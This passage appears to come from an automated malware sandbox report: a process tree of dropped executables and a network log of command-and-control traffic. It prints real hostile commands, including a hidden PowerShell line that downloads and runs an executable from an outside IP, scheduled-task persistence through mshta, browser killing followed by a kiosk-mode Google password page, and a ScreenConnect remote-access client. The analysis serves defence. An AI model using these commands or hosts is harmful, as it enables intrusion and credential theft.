                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:3272
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2240 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:3292
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1436 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:2
                                    6⤵
                                      PID:836
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2520 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:1504
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3492 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                      6⤵
                                        PID:3056
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3608 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                        6⤵
                                          PID:3156
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 556
                                      4⤵
                                      • Loads dropped DLL
                                      • Program crash
                                      PID:344
                                  • C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:596
                                  • C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:1696
                                    • C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2548
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 556
                                      4⤵
                                      • Program crash
                                      PID:2984
                                  • C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:1296
                                    • C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1628
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 500
                                      4⤵
                                      • Program crash
                                      PID:580
                                  • C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:816
                                  • C:\Users\Admin\AppData\Local\Temp\1089286001\aca90f55db.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089286001\aca90f55db.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1464
                                  • C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:2176
                                    • C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1572
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 500
                                      4⤵
                                      • Program crash
                                      PID:2032
                                  • C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:2744
                                  • C:\Users\Admin\AppData\Local\Temp\1089289001\5782e13f6e.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089289001\5782e13f6e.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:2004
                                  • C:\Users\Admin\AppData\Local\Temp\1089290001\2b8d02974d.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089290001\2b8d02974d.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Modifies system certificate store
                                    PID:1784
                                  • C:\Users\Admin\AppData\Local\Temp\1089291001\fd81d29568.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089291001\fd81d29568.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:3116
                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4140
                                  • C:\Users\Admin\AppData\Local\Temp\1089292001\3e0505c684.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089292001\3e0505c684.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3708
                                  • C:\Users\Admin\AppData\Local\Temp\1089293001\1b80ca21fe.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089293001\1b80ca21fe.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:2672
                                  • C:\Users\Admin\AppData\Local\Temp\1089294001\716ddbb44f.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089294001\716ddbb44f.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:2500
                                  • C:\Users\Admin\AppData\Local\Temp\1089295001\c139e4b71c.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1089295001\c139e4b71c.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SendNotifyMessage
                                    PID:4068
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM firefox.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3244
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM chrome.exe /T
                                      4⤵
                                      • Kills process with taskkill
                                      PID:916
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM msedge.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:344
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM opera.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:308
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM brave.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      PID:3180
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                      4⤵
                                        PID:3160
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                          5⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of SendNotifyMessage
                                          PID:1872
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.0.974074840\1297266081" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {920f7147-3833-4628-a0a4-71d94b31f979} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 1304 115cf958 gpu
                                            6⤵
                                              PID:2188
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.1.1085012910\911290864" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62e49650-7555-4268-8034-4d78d6226e7f} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 1504 d74b58 socket
                                              6⤵
                                                PID:2180
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.2.866159266\495560448" -childID 1 -isForBrowser -prefsHandle 2204 -prefMapHandle 2200 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d663414d-787f-44c5-bbbf-f26f59be95b1} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 2216 19f04a58 tab
                                                6⤵
                                                  PID:3956
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.3.2109788058\1664269459" -childID 2 -isForBrowser -prefsHandle 2772 -prefMapHandle 2768 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ef77e4f-b096-4c68-96a6-f9377f9222a9} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 2784 d6f958 tab
                                                  6⤵
                                                    PID:3056
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.4.1639508946\1729018505" -childID 3 -isForBrowser -prefsHandle 3704 -prefMapHandle 3700 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {624a4419-d2ee-4b2c-9a2e-067b1d2153e9} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3716 1edcbf58 tab
                                                    6⤵
                                                      PID:3132
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.5.868853210\482986861" -childID 4 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82b3669e-63d7-4307-9e35-06c789620853} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3816 1f55cf58 tab
                                                      6⤵
                                                        PID:3680
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.6.436075440\561008601" -childID 5 -isForBrowser -prefsHandle 3996 -prefMapHandle 4000 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f964c14-16ff-4ff0-be88-c6973977807f} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3988 1f55a858 tab
                                                        6⤵
                                                          PID:3456
                                                  • C:\Users\Admin\AppData\Local\Temp\1089296001\cd7bf9405c.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1089296001\cd7bf9405c.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:3120
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c schtasks /create /tn 4rRGFmaI72f /tr "mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta" /sc minute /mo 25 /ru "Admin" /f
                                                      4⤵
                                                        PID:968
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn 4rRGFmaI72f /tr "mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta" /sc minute /mo 25 /ru "Admin" /f
                                                          5⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3440
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies Internet Explorer settings
                                                        PID:3416
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                          5⤵
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Downloads MZ/PE file
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3980
                                                          • C:\Users\Admin\AppData\Local\Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
                                                            "C:\Users\Admin\AppData\Local\Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:784
                                                    • C:\Users\Admin\AppData\Local\Temp\1089297001\d9b3cb7467.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1089297001\d9b3cb7467.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      PID:3912
                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4296
                                                    • C:\Users\Admin\AppData\Local\Temp\1089298001\ae7650820a.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1089298001\ae7650820a.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3436
                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                        4⤵
                                                          PID:4396
                                                  • C:\Windows\system32\msiexec.exe
                                                    C:\Windows\system32\msiexec.exe /V
                                                    1⤵
                                                    • Enumerates connected drives
                                                    • Boot or Logon Autostart Execution: Authentication Package
                                                    • Drops file in Program Files directory
                                                    • Drops file in Windows directory
                                                    • Modifies data under HKEY_USERS
                                                    • Modifies registry class
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1392
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 86FC0E5117DF6651A3DE8EA16C52C134 C
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1936
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID623.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259446432 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                        3⤵
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        PID:596
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 24DB031047C19720B6CE421BC212F8A8
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1084
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding F3A72156E91D9BDB4D0127C429D93822 M Global\MSI0000
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2252
                                                  • C:\Windows\system32\vssvc.exe
                                                    C:\Windows\system32\vssvc.exe
                                                    1⤵
                                                      PID:1092
                                                    • C:\Windows\system32\DrvInst.exe
                                                      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D0" "00000000000005E4"
                                                      1⤵
                                                      • Drops file in Windows directory
                                                      • Modifies data under HKEY_USERS
                                                      PID:1724
                                                    • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe
                                                      "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=4c1c2002-a97f-4c37-803c-c5cb50aec162&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="
                                                      1⤵
                                                      • Sets service image path in registry
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in System32 directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1228
                                                      • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
                                                        "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "a4577e1f-49e7-4e62-bd1c-af5de57da05b" "User"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2432
                                                      • C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
                                                        "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "0d0781cb-4444-4bcb-973b-9e5e2bd28140" "System"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        • Modifies data under HKEY_USERS
                                                        PID:1724
                                                    • C:\Windows\system32\taskeng.exe
                                                      taskeng.exe {58647526-2BB0-4FBC-ADA9-B981778F2958} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
                                                      1⤵
                                                        PID:1656
                                                        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1296
                                                        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3776
                                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                        1⤵
                                                          PID:3232
                                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                          1⤵
                                                            PID:3472

                                                          Network

                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 4
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Refresh: 0; url = Login.php
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 156
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
